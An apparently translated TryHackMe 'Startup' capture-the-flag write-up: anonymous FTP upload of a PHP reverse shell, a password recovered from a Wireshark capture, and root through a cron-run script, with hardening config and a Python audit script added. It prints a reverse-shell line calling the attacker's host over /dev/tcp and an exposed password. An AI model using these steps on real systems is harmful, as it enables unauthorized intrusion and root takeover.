
【TryHackMe】Startup (Wireshark packet analysis, cron job privilege escalation)

Disclaimer

The host attacked in this article was legally authorized. The tools and methods used here are for learning and exchange only; do not use the tools or the approach described in this article for any illegal purpose. I take no responsibility for any consequences that result from doing so, nor for any misuse or damage caused.

Service scan

┌──(root㉿kali)-[~]
└─# nmap -sV -Pn 10.10.171.61
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 02:51 EDT
Nmap scan report for 10.10.171.61
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds

FTP, SSH and HTTP services are open.

Anonymous FTP login

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 ..
-rw-r--r--    1 0        0               5 Nov 12  2020 .test.log
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.

I downloaded all the files for local analysis. The ftp folder is empty, but it is world-writable.

Contents of notice.txt

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# cat notice.txt
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

Could maya be an SSH username?

important.jpg shows two lines of text

Everybody asks who's the impostor but nobody asks how's the impostor

I could not find anything useful in it.

Attacking port 80

Opening the web service on port 80 shows a short message:

No spice here! Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly! — Dev Team

The page source contains one comment:

when are we gonna update this??

Let's brute-force directories

┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.171.61

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.171.61/_21-11-06_03-07-44.txt

Error Log: /root/dirsearch/logs/errors-21-11-06_03-07-44.log

Target: http://10.10.171.61/

[03:07:45] Starting:
[03:08:41] 301 -  312B  - /files  ->  http://10.10.171.61/files/
[03:08:42] 200 -    1KB - /files/
[03:08:47] 200 -  808B  - /index.html

There is a files directory, and its listing is identical to the FTP share. That makes the approach straightforward: upload a webshell over FTP and request it through the web server to trigger a reverse shell. We already know the ftp folder is writable.
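The root cause on the server side is an anonymous-writable FTP directory that Apache also publishes with PHP execution enabled. The fragment below is an added, assumed configuration (not the room's real vsftpd.conf or virtual host; the /srv/ftp path is a placeholder) showing the weak settings next to the corrected ones.

```conf
# ---- vsftpd.conf (assumed) ----
# Weak: anonymous sessions may upload into any directory the ftp user can write,
# and the "ftp" subfolder in the share is mode 777, so anyone can drop files there.
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES

# Corrected: anonymous access stays read-only; uploads require a real account.
# Also chmod 755 the share directories so the FTP user itself cannot write to them.
anonymous_enable=YES
write_enable=NO
anon_upload_enable=NO
anon_mkdir_write_enable=NO

# ---- Apache virtual host (assumed, mod_php) ----
# Weak: the FTP share is exposed as /files with the default PHP handler in effect,
# so an uploaded .php file is executed, not served as a download.
Alias /files /srv/ftp

# Corrected: publish the share, but never execute anything stored in it.
Alias /files /srv/ftp
<Directory /srv/ftp>
    Options -ExecCGI -Includes
    php_admin_flag engine off
    <FilesMatch "\.ph(p[3-7]?|tml|ar)$">
        Require all denied
    </FilesMatch>
</Directory>
```

With php-fpm instead of mod_php, omit php_admin_flag and make sure no SetHandler/ProxyPassMatch for .php applies to this directory; the FilesMatch deny still blocks direct requests.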

Uploading the webshell over FTP

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put /root/reverse-shell.php ./shell.php
local: /root/reverse-shell.php remote: ./shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
3460 bytes sent in 0.00 secs (28.6932 MB/s)

Trigger the reverse shell and get a webshell

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 46938
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:14:50 up 24 min,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

In the filesystem root there is a file recipe.txt

www-data@startup:/$ cat recipe.txt
cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

What is the secret spicy soup recipe?

love

Lateral movement to lennie

Looking at the home directory, there is one user, lennie, but we have no permission to view that folder.
Checking /etc/passwd reveals another user: vagrant.

The filesystem root also contains a folder incidents, owned by www-data, with a file suspicious.pcapng inside; I transferred it back to Kali for analysis.

Opening the capture in Wireshark, it looks like the network traffic of a previous attacker.
Frame 177 contains lennie's password.

c4ntg3t3n0ughsp1c3

Getting user.txt

www-data@startup:/tmp$ su lennie
su lennie
Password: c4ntg3t3n0ughsp1c3

lennie@startup:/tmp$ cd /home
cd /home
lennie@startup:/home$ ls
ls
lennie
lennie@startup:/home$ cd lennie
cd lennie
lennie@startup:~$ ls
ls
Documents  scripts  user.txt

Privilege escalation to root

Let's look at the scripts folder and the script inside it

lennie@startup:~$ cd scripts
cd scripts
lennie@startup:~/scripts$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root   root   4.0K Nov 12  2020 .
drwx------ 6 lennie lennie 4.0K Nov  6 08:43 ..
-rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root   root      1 Nov  6 08:57 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
lennie@startup:~/scripts$ ls -alh /etc/print.sh
ls -alh /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh

Analysis

planner.sh is owned by root and, judging by its name, is run by some scheduled task; an ordinary user has no write permission on it. But the script calls another script, /etc/print.sh, and that file is owned by lennie (user and group). In other words, we can write a reverse shell into that script and root's scheduled job will run it.
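The weakness is a root-run scheduled script that calls a file a lower-privileged user owns. The audit below is an added example, not part of the original writeup: it extracts the absolute paths a script references and reports each one a non-root user could modify or replace, including through a user-owned parent directory such as /home/lennie (a user who owns the parent can rename the whole scripts directory and substitute another). The uid 1000 for lennie and the sample permission table are constructed from the listing above.

```python
import os
import re
import stat
from collections import namedtuple

FileInfo = namedtuple("FileInfo", "uid mode")  # mode: permission bits, i.e. stat.S_IMODE(st_mode)

# Absolute paths a script touches: its interpreter, commands it runs, redirect targets.
PATH_RE = re.compile(r"(?<![\w.])/(?:[\w.\-]+/)*[\w.\-]+")

def referenced_paths(script_text):
    """Absolute paths in the script, in first-appearance order; comments are skipped."""
    lines = [ln for ln in script_text.splitlines()
             if ln.startswith("#!") or not ln.lstrip().startswith("#")]
    return list(dict.fromkeys(m for ln in lines for m in PATH_RE.findall(ln)))

def writable_by_others(info, trusted_uid):
    """Why a user other than trusted_uid could write this entry, or None if nobody can."""
    if info.uid != trusted_uid:
        return f"owned by uid {info.uid}"
    if info.mode & (stat.S_IWGRP | stat.S_IWOTH) and not info.mode & stat.S_ISVTX:
        return "group/world writable"
    return None

def weak_dependencies(script_text, lookup, trusted_uid=0):
    """(path, reason) for each referenced path that a non-trusted user could modify or
    replace, checking the entry itself and then every parent directory above it."""
    findings = []
    for path in referenced_paths(script_text):
        node, reason = path, None
        while reason is None and node != "/":
            info = lookup(node)  # None means "not present": nothing to check at this level
            why = writable_by_others(info, trusted_uid) if info else None
            if why:
                reason = why if node == path else f"parent {node} {why}"
            node = os.path.dirname(node)
        if reason:
            findings.append((path, reason))
    return findings

# Constructed sample mirroring the room's listing (lennie's uid of 1000 is an assumption):
# planner.sh itself is root-owned, but /etc/print.sh and /home/lennie belong to lennie.
PLANNER_SH = "#!/bin/bash\necho $LIST > /home/lennie/scripts/startup_list.txt\n/etc/print.sh\n"
SAMPLE_FS = {"/bin": FileInfo(0, 0o755), "/bin/bash": FileInfo(0, 0o755),
             "/etc": FileInfo(0, 0o755), "/etc/print.sh": FileInfo(1000, 0o700),
             "/home": FileInfo(0, 0o755), "/home/lennie": FileInfo(1000, 0o700),
             "/home/lennie/scripts": FileInfo(0, 0o755),
             "/home/lennie/scripts/startup_list.txt": FileInfo(0, 0o644)}
```

weak_dependencies(PLANNER_SH, SAMPLE_FS.get) flags both /etc/print.sh (owned by uid 1000) and startup_list.txt (its parent /home/lennie is owned by uid 1000); on a live host, pass a lookup built on os.stat that returns FileInfo(st.st_uid, stat.S_IMODE(st.st_mode)) or None for absent paths, and run it over every script referenced from /etc/crontab, /etc/cron.d and the per-user crontabs.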

Attack

Write the payload into /etc/print.sh

lennie@startup:~/scripts$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
<cho "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

Start a listener, wait about a minute, and we get root

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 49342
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:~# cat /root/root.txt
cat /root/root.txt

